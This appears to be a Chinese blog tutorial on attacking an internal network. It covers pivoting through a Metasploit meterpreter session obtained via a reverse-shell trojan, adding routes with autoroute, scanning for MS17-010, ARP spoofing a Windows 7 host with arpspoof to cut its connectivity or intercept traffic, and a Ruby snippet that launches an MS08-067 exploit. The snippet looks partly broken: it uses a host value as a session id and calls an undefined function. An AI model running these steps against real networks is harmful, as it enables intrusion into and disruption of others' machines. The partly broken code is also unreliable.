msf 代理内网机器后,进行内网其他网段机器的渗透

##titile :msf 代理内网机器后,进行内网其他网段机器的渗透

首先利用反弹木马返回meterpreter shell

利用这个shell 查该机器网段,及添加路由,为渗透其他的机器做准备

  • run get_local_subnets //获取路由地址
  • run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
  • run autoroute -p //查看添加的路由
    +run autorouute -d //删除添加的路由
  • background //挂载到后台运行

至此,我们成功的把路由网段给添加到msf中。backgroup让会话在后台运行,我们可以用ms17-010来扫描整个内网机子了。

在linux环境

ARP攻击的攻击原理

  • ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

操作指令:

· fping -asg 网络号/子网掩码 # 查看内网在线主机

· arpspoof -i eth0 -t 目标IP 网关IP # ARP欺骗

  • 1.取得 win 7 上的 ip 地址 和网关地址

如:

· ip地址: 192.168.135.131

· 网关地址: 192.168.135.2

查看同一局域网内当前在线的主机情况:

fping -asg 192.168.135.0/24

在查找到网内在线的主机后,就可以选择一个作为攻击的目标了,这里以 win7 为受害主机,攻击如下:

arpspoof -i eth0 -t 192.168.135.131(攻击机ip) 192.168.135.2(网关)
这样可以让目标机器无法联网通信。

但实际情况,如果我需要在网吧使用我远程服务器进行arp攻击的话,还需要进行本地的代理,让本地代理我的远程服务器这样使我的服务器处于同个网段。不然就只能带个u盘了

### 如何将在 Metasploit Framework 中获得的内网会话传递到外网 在渗透测试过程中,通过 Metasploit Framework 获得内网主机控制权后,通常需要将该会话转发至外部网络以便进一步操作。以下是实现这一目标的具体方法: #### 使用 `pivot` 技术 Metasploit 提供了一种称为 `pivot` 的功能,允许用户通过已经获取的 Meterpreter 会话来访问其他内部网络资源。这种技术可以通过设置动态端口转发或路由表完成。 1. **启用端口转发** 在 Meterpreter 会话中执行以下命令以创建一个动态端口转发: ```bash portfwd add -l <LPORT> -p <RPORT> -r <TARGET_IP> ``` 这里的 `<LPORT>` 是本地监听端口,`<RPORT>` 是远程目标服务的端口,而 `<TARGET_IP>` 是要连接的目标服务器地址[^5]。 2. **配置路由** 如果需要扫描整个子网或者访问多个内网设备,则可以使用 `autoroute` 或手动添加路由条目: ```bash run autoroute -s <SUBNET>/<CIDR> -n <SESSION_ID> ``` 此命令会在当前会话上自动为指定的子网添加一条静态路由记录[^4]。 3. **利用已有的会话发起新攻击** 当成功设置了上述两项之后,就可以以外部机器作为跳板继续针对更深层级的目标发动新一轮攻势了。例如,如果发现了另一台位于同一局域网内的易受攻击的服务实例(比如 SMB),那么可以直接调用相应的 exploit 并指向那个新的 IP 地址即可。 #### 实现代码示例 下面给出一段简单的 Ruby 脚本片段展示如何自动化部分流程: ```ruby session_id = client.session_host # 获取当前 session id subnet = '192.168.x.y' # 替换为目标实际所在的网段范围 cidr = '/z' # CIDR 表达形式表示掩码长度 print_status("Adding route to #{subnet}#{cidr}") run_single("run autoroute -s #{subnet}#{cidr} -n #{session_id}") # 假定我们想要尝试 MS08-067 漏洞... exploit_datastore['RHOSTS'] = ['192.168.a.b'] exploit_datastore['LHOST'] ||= Rex::Socket.source_address('127.0.0.1') execute_exploit() ``` #### 注意事项 尽管这种方法非常强大且灵活,但在真实环境中实施之前务必确认拥有合法授权以及遵循当地法律法规的要求[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值